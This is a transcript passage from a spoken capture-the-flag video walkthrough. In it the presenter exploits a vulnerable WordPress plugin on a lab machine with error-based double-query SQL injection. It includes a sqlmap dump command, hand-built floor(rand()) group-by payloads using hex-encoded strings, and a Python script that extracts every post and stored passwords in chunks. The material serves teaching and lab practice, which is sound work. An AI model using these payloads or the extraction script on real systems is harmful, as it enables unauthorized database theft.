is, what was it? Yay, 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 like that. If we just do this query, it returns Boolean because it failed. If we put that in double quotes, something is escaping our quotes, which is odd because if we look at our code, we don't have anything that suggests sanitization. But we do have a include statement. So if we cat that, actually, before we do that, the very first thing I would do would be info.php, php info, and let's go to info.php. I would look at like safe mode, if safe mode is somewhere. SQL safe mode off. I would do filter. The filter flag is off. So it doesn't look like it's any PHP config that's doing it. So that's why the next step would be looking at the script. And that was a WordPress config script. Cat test. We want to look at WP config. If we had looked at this and analyzed the whole top, we'd realize there's nothing there that does whitelisting, but it does require another script to be ran, which is WP settings. And if we cat WP settings and look up quite a bit, let's see, I think it's before that. We have add magic quotes and set up request for get and post. And it's this function that is screwing us up. So let's remove this real quick. So let's go up 3 directories. Sed s wp magic. We'll comment out with 2 slashes. And this was wp settings. So now if I go back, refresh this, there's no more escaping of the quotes, and this now returned an object which caused us to get an error message. So let's revert this so it's back to how it was. I just wanted to show you some of the filtering WordPress may be doing. So that's fixed. Then let's begin with the double query injection error. It's a tough one to do in SQL injection. So we're going to use SQLMap a little to aid us, and this will show you how to kind of troubleshoot what SQLMap is doing so you can understand the injections when you use an automated tool, which is pretty cool. So SQLMap-R, DB, lcars DB. SQLMap-R, lcars_DB. We'll do --dump all, and we need to do --proxy equals burp, which is 27001.8080. If this begins dumping, we can go into burp, go to a history, and see all the things it's doing. Well, it's doing sleep commands. No. What are you trying to crack? Okay, now we're getting to the actual dumping. I guess it's trying to identify the SQL injection. But this is what a double query injection looks like. And SQLMap automatically adds a little bit of obfuscation, so it's a bit more complex than it is, but it's still a relatively complex query. The idea is, by default, or not by default, this is a valid SQL command, but it uses a bunch of dynamic things like this count. Then you have this random function. Floor is essentially rounding, and rand is generate a random number. And then you have group by. And all those will create an error message. And that error message will be the contents of this select query. So that is exactly what SQLMap is doing. And we can kind of show this. Let's see. Does this query work? Let's send this in. Bad request. I don't have everything. Make sure I get everything. Go. I don't know if that is a valid one. I hate how much randomization SQLMap does. Get response. Basic search. That'll be one. So let's see. We will Control-Shift-U this, copy this, and we will get off WordPress, and we'll do docker exec-it MySQL. I forgot bash again. Docker exec-it MySQL bash. And we need MySQL-u root -p and the password. NCC 1701E. And we can paste this query in. And we see that's weird. There we go. So we see the query is generating an error. But if we had just taken off one of those things, let's say this group by X, it no longer generates an error and just generates junk. So let's make this a bit simpler and just select the database name. So we'll select count star concat select version for rand I think I typed that right. Yes, I did. So we can take a look at what each piece is doing. So if we do select count star concat select version, I didn't type that one correct. Let's see. Select count star. We have it counting the number of times 5719 appeared. And 5719 appeared just once, and that is the version of SQL we are running. So what we could do is add that floor rand times 5 and see what that does. Now we just have a random character at the end of that number, as we see that 19 and then a digit is changing. So let's add the as a from information schema.tables, and we get that appearing 364 times. If we remove as a, nothing really happens. It's just labeling the column. So that version, instead of being called the select statement, it's called A. And we can group by that. Tables G. And once we start grouping by that column with all the other random data, that's where the error comes about. And we can see duplicate entry for 57191 for a key, group key. So if we wanted to actually extract data, we can remove this version, and we can do something like select post content from wordpress.wp underscore posts limit, let's say 32.1. Because then just remember this post content actually having data. If we're selecting from something that has no data, it's going to be hard to know if we succeeded. So do this a few times, and we don't get any errors. And why is that? Let's see, floor rand. We got the concat account. Let's see. Select one from. Something went wrong. Select one from. Select count. There's content. Let's do mid 063. Well, now we're getting an error message, but that's still not what we want. The reason why I did mid is because error messages are limited to 64 characters. Oh, we need one. So, at 1 to 63, plus that random thing, that is a 64 character error message. So that's why we need the mid there. If we do 64, I'm guessing that one's going to get truncated off. Yep. So we no longer have a random number. So the next thing to do is send this over to our browser and see if it will error out. So query, see what happens. Warning, the Federation Diplomatic Corps are busy trying to bring in an end. That's good. And again, if we do 63, so this number, the first number, it was 1. That's the number to start at. So now we can bring an end to the Dominion War. This means the Enterprise and her crew, A. So we can do, 127? And start reading even more. This is kind of a pain to do manually, and SQLMap is doing that for us. If we look at SQLMap's query, we have select mid, if null, cast level 154. So they're doing 54 characters. But let's start creating a Python script to solve this for us and duplicate essentially what Nmap is doing. Or not Nmap, SQLMap is doing. So we'll do vim inject.py is what we'll call it. And we use the request module. And let's see. Content number is equal to, what was it, 32? Let's go back to this query. Did I do it in my browser? I did. So proxy intercept on fresh repeater to code. We are doing query 32. So content number will equal 32. Actually, let's call this post number is equal to 32. Let's set content is equal to blank. And we now need to create a value. So values is equal to query. And this is the get request portion. Go back here. I didn't copy everything. Copy that. And I think that's fine. We can now, let's see, limit 32, 1. And this needs to be different. So dot format, we'll call that one content number, and the second one post number. So all those two brackets did was say, hey, in this string where this is, take the very first one out of this format thing. So that's going to be content num, which starts at 1. And then for that second one, right after limit, take this post num, which is 32. So I'm just setting this up so this value can be dynamic, because eventually we're going to want to loop over this. So now we can do r for request equals request.get http 10.10.10.61 wp content plugins lcars, and we can do test.php. Params equals values. Params means put it in the get parameter. I think if it was data equals values, it would be a post request. Okay. And now we can print r.text and see if this works. Python 3. Let's use Python 3. Inject.py. Maybe it doesn't work. Nope, it does. So we got duplicate entry is going to bring to an end. So the next thing we have to do is have a Python script only pull this data. It only wants to pull this string. So we can write a regular expression to either grab at the start of this and go until an apostrophe and then end at 3 parentheses 4 key. Or we can do something with concat like SQLMap is doing and put a tag before and after. So I'm trying to think what we want to do. Let's put a tag before and after and mimic what SQLMap is doing. It'd be more efficient not to do that, but we're going to waste some space and do extra requests in order to add that. So we're going to lower our space to 50 characters from 63, just because we're going to be adding stuff to the payload. So this concat, we're going to do, where is it? 0x 69 70 70 73 65 63. Let's see if that's right. So I can't use quotes because remember WordPress escapes quotes, so I have to do the hex representation of characters. And try that again. And we do have it. So we do have IPSEC is the start of that. So we can go to the end, right after or before Florand. We can do 0x 69 70 70 73 65 63. Then do Florand again. So now we have IPSEC on both ends. IPSEC, IPSEC. So we can import the module RE for regular expressions, and then we'll create a regular expression saying RE data equals RE compile IPSEC, and we want to capture everything between it. So everything between is in these parentheses. Then IPSEC. And we're just going to ignore that number. And we want to say re.all. And the reason for that is by default, this period is only going to match characters. It's not going to match line breaks. So if there's any like special line break characters or other things, this dot's not going to match it, which means the stir won't match it. So what the stir does is says, hey, just repeat everything you did previously. So line breaks would have killed us if we didn't have this dot all to say, hey, dot is actually everything, not everything but new lines. If that makes sense. Hopefully it does. So now we have to, we can do a try statement and say content plus equals re dot find all re data r dot text. re data is the thing we just created. That's the regular expression. r dot text is again the response, and we want 0, so we get the very first match. Except print IPsec can't code. Now we want to do print content and see what this gives us. Now we're just getting the text. So we've successfully captured what is between IPsec. So the next piece is to kind of tie this all together and make this query get everything. So we're going to say create a function def no regrets. Oh, we don't have to do the function yet. We just have to create a while loop. While no regrets is equal to 0. I'm going to do these things. Let's put this all in one thing. What the hell? That's not what I wanted to do. Okay, 2, 3, 4. And escape Q. Let's see. 1, 2, 3, 4, 5. 5 at A. Ooh, macro's done. I probably could have just hit space enough times to do that quicker, but using macros is always cool. So that's a infinite loop. No regrets is equal to 0. And let's see. What are we doing with this? We're going to create a value, and that value is going to get set. And we need to up this content number. This request.get, that's going to be fine. We're always going to try. And we're going to, before we try, we're going to do a if read.search is equal to IPsec \d for digit, and r.text final line, I guess, or we'll call it chunk. So we'll have to retune this because we have to make sure a query is exactly 64 characters, and I don't think it is. I think we have to make this 52. Content plus equals find all data r.text 0 no regrets is equal to 1. So the reason why I was saying we have to make this 52 is because we can't have this number in a request. We want to always truncate that random number off. And the error can only be 64 characters. So if we make IPSEC end at the 64th character, there's never going to be a digit until the final chunk. And IPSEC is 6 characters, so IPSEC plus IPSEC, that is 12. 52 plus 12 is 64. So that's how I got that. Okay. And then after this, we can do an else. And then we can say for at A to indent that. Try content plus equals refind all. That is fine, except I can't code. I don't even know when it would ever hit that. But if it does, that'll be fun. And we need to do content num is equal to content num plus 52. And we want to print content. So let's see if this infinite loop kills us. We probably want to print content at the end because we're always creating new content. Python 3. And if this finishes within, I guess now, we'll assume it works. So we have definitely more than 52 characters. And it looks like we have the entire post. So the final piece of this is going to be making this a function and going through every single post in the database. So we can do a definition file of, well, not file, function, get content post ID. And this is, I think, 12 lines, so 12 at A, 2 at A, there we go. That's all indented. We want to do content num is equal to, we can just take this data. Okay, so content num, post num, no regrets. That looks good. And at the end of this function, we have to return content. And now we can print get content. And post ID is 32. Is equal to post ID. Forgot that semicolon. Make sure this still works. It does. And now we can say for x in range 1, we'll say 50, print x, and also print get content. And then we'll print x to create a line break. And now when we run this, hey, we hit that exception. I don't know exactly when that is, but we're hitting that exception. I want to check that out. And everything appears to be the same. So we screwed up our code somehow, because this shouldn't be repeating, and of course IPsec can't code at 2 in the morning. Ah, I love that exception. So where'd I screw up? I screwed up right here at get content 32. There we go. Now we're dumping all the content. That IPsec can't code has never been more true. And we just saw the passwords fly by. And at 42, we're getting a bunch of errors, and that's probably the very last post. So let's go to a database. And we can just select that. So describe WP posts, use WordPress, select ID post name from WP posts. So we got the IDs stopping at 40, and they take a break and come back at 50. So that's why we started seeing that IPsec can't code constantly right around then. So let's see. Password. And now we could get the passwords that we got from SQLMap. And of course, this code could definitely be improved on. So if you wanted to, feel free to improve on that code. It should be relatively easy to do. It's a fun SQL injection challenge with Python because it is a relatively complex query. So I hope you guys enjoyed the video. This has probably been incredibly long, and I am tired, so I'm going to get some sleep. Take care, and happy St. Patrick's Day, because that's when this video will be getting uploaded, and that's what day it is in the US right now at 2 in the morning. Take care.